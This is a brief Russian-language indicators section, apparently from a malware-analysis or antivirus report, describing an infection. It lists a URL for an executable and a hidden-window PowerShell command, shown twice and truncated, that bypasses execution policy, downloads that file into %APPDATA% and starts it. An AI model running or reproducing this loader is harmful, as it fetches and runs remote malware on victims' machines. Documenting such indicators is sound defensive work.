Техническая информация
- http://www.amspeconline.com/123/etna.exe как %appdata%\ba.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowZtyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.amspeconline.com/123/etna.exe','%APPDATA%\ba.exe');Start-Process ...
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowZtyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.amspeconline.com/123/etna.exe','%APPDATA%\ba.exe');Start-Process ...' (со скрытым окном)